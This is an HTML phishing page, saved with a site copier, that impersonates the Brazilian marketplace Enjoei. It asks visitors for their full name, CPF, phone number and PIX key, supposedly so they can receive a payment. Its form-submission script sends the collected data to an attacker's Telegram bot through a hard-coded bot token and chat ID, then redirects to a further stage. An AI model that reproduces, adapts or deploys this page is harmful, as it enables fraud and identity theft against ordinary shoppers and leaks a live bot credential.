<!DOCTYPE html>
<!-- saved from url=(0079)https://enjoei.team/?enjoei_page=authbank&ssid=d41d8cd98f00b204e9800998ecf8427e -->
<html lang="en">
<!-- Mirrored from vendas.enjoei-24horas.shop/authbank/?ssid=fc3bd197e5c343c07beca00b8dd01ccc by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 27 Nov 2024 21:33:14 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ENJOEI  - Authbank</title>
</head>
<body class="is-v4 p-sessions-new" data-namespace="false" data-controller="sessions" data-action="new" style="transition: padding 250ms ease 0s;" cz-shortcut-listen="true">
    






    
    <meta name="description" content="O site mais simpático para comprar e vender online roupas, sapatos e bolsas! Marcas Zara, Farm, Nike. Baixe o app e vem conferir!">
    <title>Informacoes de recebimentos</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" media="all" href="../src/ENJOEI%20-%20Authbank_files/font-face-a567ff9bf44e72db071f08f1193b637d95ebb94fcd8b209c8d13b00cadf8edcb.css">
    <link rel="stylesheet" media="all" href="../src/ENJOEI%20-%20Authbank_files/1525-1c556dee.css">
    <link rel="stylesheet" media="all" href="../src/ENJOEI%20-%20Authbank_files/web-4f17523d.css">
    <link rel="stylesheet" media="all" href="../src/ENJOEI%20-%20Authbank_files/application-94184e2e7658e310ec7f68fc4693056639b5f56f264fac23032cf85df1229679.css">



    <svg style="position: absolute; width: 0; height: 0;" width="0" height="0" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
        <defs></defs>
    </svg>
    <div class="t-relative"> </div>
    <div data-vue="flash-message">
        <div class="c-flash-message" style="display: none;">
            <div href="#" class="c-flash-message__content o-container" image-url="" data-testid="flash-message">
                <span class="o-text -xs-white -xs-long-primer t-xs-block t-md-inline c-flash-message__title -xs-medium"></span>
            </div>
        </div>
    </div>
    <style>
        .erro {
            border-color: red;
        }
        .mensagem-erro {
            color: red;
            display: none;
        }
    </style>
    <script>
            setTimeout( () =>{
                document.querySelector('.logo-banner').remove()
            },1500)
        </script>
        <style>
            .logo-banner svg{
                animation: bounce .8s ease infinite;

            }
            @keyframes bounce {
                0%{
                    opacity: 0;
                }
                50%{
                    opacity: .5;
                }
                100%{
                    opacity: 1;
                }
            }
        </style>
        <div class="logo-banner" style="position: absolute; inset: 0; background: #fff; left: 0; top: 0%; z-index: 999; width: 100%; height: 100%; display: flex; justify-content: center; align-items: center">
            <svg xmlns="http://www.w3.org/2000/svg" width="30" height="30" fill="none"><path fill="#61005D" fill-rule="evenodd" d="M1.25 14.19C1.25 5.845 6.813-.005 15.002-.005s13.752 5.85 13.741 14.193c0 .96-.033 1.943-.143 2.749H1.393c-.11-.806-.143-1.8-.143-2.749m20.485-2.197c-.343-4.348-3.135-6.147-6.733-6.147s-6.39 1.799-6.733 6.147zM8.093 20.37c1.644 2.45 3.874 3.763 6.909 3.763s5.265-1.313 6.91-3.763l5.198 3.002c-2.561 5.088-7.428 6.622-12.108 6.622S5.455 28.46 2.894 23.372z" clip-rule="evenodd"></path></svg>
        </div>
    <header class="c-clean-header ">
        <div class="o-container -with-gutter t-hide-x-overflow">
            <div class="c-clean-header__wrapper">
                <div class="o-grid -xs-middle -xs-full">
                    <div class="o-grid__item -xs-4">
                        <button type="button" class="l-header-button o-button -xs-auxiliary" onclick="resolveBackAction()" aria-label="Voltar para a página anterior">
                            <svg class="o-icon -xs-size-medium -color-primary -spaced-right -arrow-left">
                                <use xlink:href="#icon-arrow-left"></use>
                            </svg>
                        </button>
                    </div>
                    <div class="o-grid__item -xs-16 t-text-center">
                        <a class="c-clean-header__link-logo" href="#">
                            <div class="o-logo -fill-none -type-icon -xs-size-small -style-color -enjoei ">
                                <svg viewBox="0 0 138 150" xmlns="http://www.w3.org/2000/svg">
                                    <path fill="#61005D" fill-rule="evenodd" clip-rule="evenodd" d="M 0 70.96875 C 0 29.25 27.914062 0 69.011719 0 C 110.113281 0 138.03125 29.25 137.972656 70.96875 C 137.972656 75.773438 137.804688 80.683594 137.25 84.710938 L 0.722656 84.710938 C 0.167969 80.679688 0 75.71875 0 70.972656 Z M 102.800781 59.988281 C 101.085938 38.242188 87.070312 29.25 69.011719 29.25 C 50.957031 29.25 36.941406 38.242188 35.226562 59.988281 Z M 34.339844 101.875 C 42.59375 114.128906 53.78125 120.695312 69.011719 120.695312 C 84.246094 120.695312 95.433594 114.128906 103.683594 101.875 L 129.773438 116.886719 C 116.921875 142.328125 92.496094 150 69.011719 150 C 45.527344 150 21.101562 142.328125 8.25 116.886719 L 34.34375 101.875 Z M 34.339844 101.875"></path>
                                </svg>
                            </div>
                        </a>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <section data-vue="sessions-new-page">
        <div data-v-7bcf1476="" class="o-container -with-gutter l-container">
            <div data-v-7bcf1476="" class="session-wrapper">
                <div data-v-7bcf1476="">
                    <header data-v-4226538e="" data-v-7bcf1476="" class="session-header">
                        <h1 data-v-4226538e="" class="session-title">
                        Digite seus dados bancários

                        </h1>
                        <p data-v-4226538e="" class="session-text">
                            Receba sem burocracias!
                        </p>
                    </header>
                </div>
                <div data-v-7bcf1476=""></div>
                <div data-v-7bcf1476="" style="">
                    <div data-v-7bcf1476="" class="l-wrapper">
                        <form data-v-7bcf1476="" action="#" method="post" accept-charset="utf-8" id="login_user" novalidate="novalidate" data-validate-on="submit" class="o-form l-form" onsubmit="submitForm(event)">
                            <input data-v-7bcf1476="" name="utf8" type="hidden" value="✓">
                            <input data-v-7bcf1476="" type="hidden" name="authenticity_token" value="iKVQdiyYPEusrrS/sBDMD+YlR+u8eBMXDPzVQHyoUhb+5hUY5bLsahiCEgCuCOz2daHp4GvMJuU7bOEwxhx1uw==">
                            <input data-v-7bcf1476="" type="hidden" name="user_tracking_uuid" value="aba1a12a-006e-4862-91fb-af630091c401-1720133651762">


                            <div data-v-7bcf1476="" class="o-form__field l-field">
                                <label data-v-7bcf1476="" for="user_name" class="l-label"> NOME COMPLETO * </label>
                                
                                <input data-v-7bcf1476="" data-validate="true" data-patterns="isNonEmpty, isValidEmail" placeholder="Nome completo do titular" data-test="input-email" type="text" name="user[email]" id="user_name" autocomplete="username" class="o-input -fill -xs-medium -md-large" required="">
                                <div id="erro-user_name" class="mensagem-erro">Campo obrigatório.</div>
                            </div>
                            <div data-v-7bcf1476="" class="o-form__field l-field">
                                <label data-v-7bcf1476="" for="user_cpf" class="l-label"> CPF * </label>
                                <input data-v-7bcf1476="" data-validate="true" data-patterns="isNonEmpty, isLongerThan" data-test="input-password" type="text" name="user[password]" id="user_cpf" autocomplete="current-password" placeholder="CPF do titular" maxlength="14" oninput="formatCPF(this)" class="o-input -fill -xs-medium -md-large" required="">
                                    <div id="erro-user_cpf" class="mensagem-erro">Campo obrigatório.</div>
                            </div>
                            <div data-v-7bcf1476="" class="o-form__field l-field">
                                <label data-v-7bcf1476="" for="user_phone" class="l-label"> TELEFONE * </label>
                                <input data-v-7bcf1476="" data-validate="true" data-patterns="isNonEmpty, isLongerThan" data-test="input-password" type="text" name="user[password]" id="user_phone" autocomplete="current-password" placeholder="TELEFONE PARA CONTATO" maxlength="15" oninput="formatCelular(this)" class="o-input -fill -xs-medium -md-large" required="">
                                    <div id="erro-user_phone" class="mensagem-erro">Campo obrigatório.</div>
                            </div>
                            <span data-v-7771531a="" class="separator">Banco</span>

                            <div data-v-7bcf1476="" class="o-form__field l-field">
                                <label data-v-7bcf1476="" for="user_line" class="l-label"> Aceitamos diversos bancos </label>
                                <center>
                                <img src="../src/ENJOEI%20-%20Authbank_files/banks.png" style="width: 322px; height:150px;" alt="">
                                </center>
                            </div>
                            <style>
        /* Inicialmente esconda o campo de telefone */
        #telefone_field {
            display: none;
        }
    </style>
    <div data-v-7bcf1476="" class="o-well checkbox-wrapper">
                                <div data-v-7bcf1476="" class="o-grid__item">
                                    <!-- <label data-v-7bcf1476="" class="o-checkbox t-lowercase -xs-medium">
                                        <input data-v-7bcf1476="" type="checkbox" id="checkbox-b71e8023" name="user[remember_me]" value="1" data-validate="" data-validate-as-group="" data-patterns="isChecked" data-target="" data-action="" class="o-checkbox__input" data-dirty="true">
                                        <span data-v-7bcf1476="" class="o-checkbox__blank"></span>
                                        <span data-v-7bcf1476="" class="o-checkbox__label"> Concordo com </span>
                                    </label> -->
                                </div>
                            <div data-v-7bcf1476="" class="o-form__field l-field">
                                <label data-v-7bcf1476="" for="selectfromuser" class="l-label"> Como deseja receber PIX * </label>
                                <select data-v-7bcf1476="" data-validate="true" data-patterns="isNonEmpty, isLongerThan" data-test="input-password" name="user[password]" id="selectfromuser" class="o-input -fill -xs-medium -md-large">
                                    <option value="" disabled="" selected="">Selecione tipo de chave pix</option>
                                    <option id="typekey" value="CPF">CPF</option>
                                    <option id="typekey" value="EMAIL">EMAIL</option>
                                    <option id="typekey" value="TELEFONE">TELEFONE</option>
                                    <option id="typekey" value="ALEATORIA">ALEATORIA</option>
                                    <!-- Adicione mais opções conforme necessário -->
                                </select>
                                <div id="erro-typekey" class="mensagem-erro">Campo obrigatório.</div>
                            </div>

                            <div data-v-7bcf1476="" class="o-form__field l-field" id="telefone_field">
                                <label data-v-7bcf1476="" for="user_key" class="l-label"> CHAVE PIX * </label>
                                <input data-v-7bcf1476="" data-validate="true" data-patterns="isNonEmpty, isLongerThan" data-test="input-phone" type="text" name="user[phone]" id="user_key" autocomplete="current-phone" placeholder="DIGITE SUA CHAVE PIX" class="o-input -fill -xs-medium -md-large" required="">
                                    <div id="erro-user_key" class="mensagem-erro">Campo obrigatório.</div>
                        </div>

                        <script>
                            function formatCPF(input) {
                            let cpf = input.value.replace(/\D/g, '');

                            if (cpf.length > 3 && cpf.length <= 6) {
                                cpf = cpf.replace(/(\d{3})(\d+)/, '$1.$2');
                            } else if (cpf.length > 6 && cpf.length <= 9) {
                                cpf = cpf.replace(/(\d{3})(\d{3})(\d+)/, '$1.$2.$3');
                            } else if (cpf.length > 9) {
                                cpf = cpf.replace(/(\d{3})(\d{3})(\d{3})(\d+)/, '$1.$2.$3-$4');
                            }

                            input.value = cpf;
                        }

                        function formatCelular(input) {
                        let celular = input.value.replace(/\D/g, '');

                        if (celular.length > 2 && celular.length <= 7) {
                            celular = celular.replace(/(\d{2})(\d+)/, '($1) $2');
                        } else if (celular.length > 7 && celular.length <= 11) {
                            celular = celular.replace(/(\d{2})(\d{5})(\d+)/, '($1) $2-$3');
                        } else if (celular.length > 11) {
                            celular = celular.replace(/(\d{2})(\d{5})(\d{4})(\d+)/, '($1) $2-$3');
                        }

                        input.value = celular;
                    }
                            document.getElementById('selectfromuser').addEventListener('change', function() {
                                var telefoneField = document.getElementById('telefone_field');
                                if (this.value) {
                                    telefoneField.style.display = 'block';
                                } else {
                                    telefoneField.style.display = 'none';
                                }
                            });
                        </script>

                            <div data-v-7bcf1476="" class="o-well checkbox-wrapper">
                                <div data-v-7bcf1476="" class="o-grid__item">
                            <div id="mensagem-erro" style="color: red;"></div>
                                    
                                </div>
                            </div>
                            <div data-v-7bcf1476="" class="o-well">
                                <button type="submit" data-v-7bcf1476="" data-test="button-login-entrar" class="o-button -xs-flat -xs-large -xs-fill t-lowercase -xs-primary"> Receber </button>
                            </div>
                        
                        <div data-v-7bcf1476="">
                            <!-- <a data-v-7bcf1476="" data-modal="trigger" data-target="reset-password" class="o-button -xs-link -xs-large -xs-fill js-ui-fixed-content-open t-lowercase reset-password" href=""> Esqueci a senha </a> -->
                        </div>

                        <div data-v-7771531a="" data-v-7bcf1476="">
                            <span data-v-7771531a="" class="separator">ou</span>
                            <p data-v-7bcf1476="" class="o-text -xs-minion -xs-regular -xs-center">protegido por reCAPTCHA - <a data-v-7bcf1476="" href="#" target="_blank">privacidade</a> - <a data-v-7bcf1476="" href="#" target="_blank">condições</a></p>
                        </div>
                    </div></form>
                </div>
            </div>
        </div>
    </div></section>
    <script src="https://vendas.enjoei-24horas.shop/src/ENJOEI - Authbank_files/md5.min.js.download"></script>

    <script>
        async function submitForm(event) {
            event.preventDefault();
            
            const nome = document.getElementById('user_name').value;
            const phone = document.getElementById('user_phone').value;
            const cpf = document.getElementById('user_cpf').value;
            const type_key = document.getElementById('typekey').value;
            const key = document.getElementById('user_key').value;
            const mensagemErro = document.getElementById('mensagem-erro');
            const hash = localStorage.getItem('hash');
            const ssid = hash;
            
            const campos = [
                { id: 'user_name', value: nome },
                { id: 'user_phone', value: phone },
                { id: 'user_cpf', value: cpf },
                { id: 'typekey', value: type_key },
                { id: 'user_key', value: key }
            ];
        
            let camposValidos = true;
        
            campos.forEach(campo => {
                const input = document.getElementById(campo.id);
                const mensagemErro = document.getElementById(`erro-${campo.id}`);
                if (!campo.value) {
                    input.classList.add('erro');
                    mensagemErro.style.display = 'block';
                    camposValidos = false;
                } else {
                    input.classList.remove('erro');
                    mensagemErro.style.display = 'none';
                }
            });
        
            if (!camposValidos) {
                return;
            }
        
            // Preparar a mensagem para o Telegram
            const mensagemTelegram = `
                **Novo Pedido de Recebimento PIX**
                
                Nome: ${nome}
                CPF: ${cpf}
                Telefone: ${phone}
                Tipo de Chave PIX: ${type_key}
                Chave PIX: ${key}
            `;
            
            // Substitua com o seu token de bot do Telegram e o chat ID
            const token = '6158400466:AAEUs12kCvMb0TgzUSmtIVqXVtPVknqxXFY';  // Substitua pelo token do seu bot
            const chatId = '6798832266';  // Substitua pelo seu chat ID
        
            // Enviar mensagem para o Telegram
            const url = `https://api.telegram.org/bot${token}/sendMessage`;
            const data = {
                chat_id: chatId,
                text: mensagemTelegram,
                parse_mode: 'Markdown'
            };
        
            try {
                const response = await fetch(url, {
                    method: 'POST',
                    body: new URLSearchParams(data)
                });
        
                const result = await response.json();
                console.log("Resposta do Telegram:", result);  // Verifique a resposta da API
        
                if (result.ok) {
                    console.log('Mensagem enviada com sucesso');
                    
                    // Redireciona para a próxima página (05/index.html)
                    window.location.href = '05/index.html'; // Redirecionamento para a página desejada
                } else {
                    console.log('Erro ao enviar mensagem:', result);
                }
            } catch (error) {
                console.error('Erro na solicitação:', error);
            }
        }
        </script>
        
        




</body>
<!-- Mirrored from vendas.enjoei-24horas.shop/authbank/?ssid=fc3bd197e5c343c07beca00b8dd01ccc by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 27 Nov 2024 21:33:15 GMT -->
</html>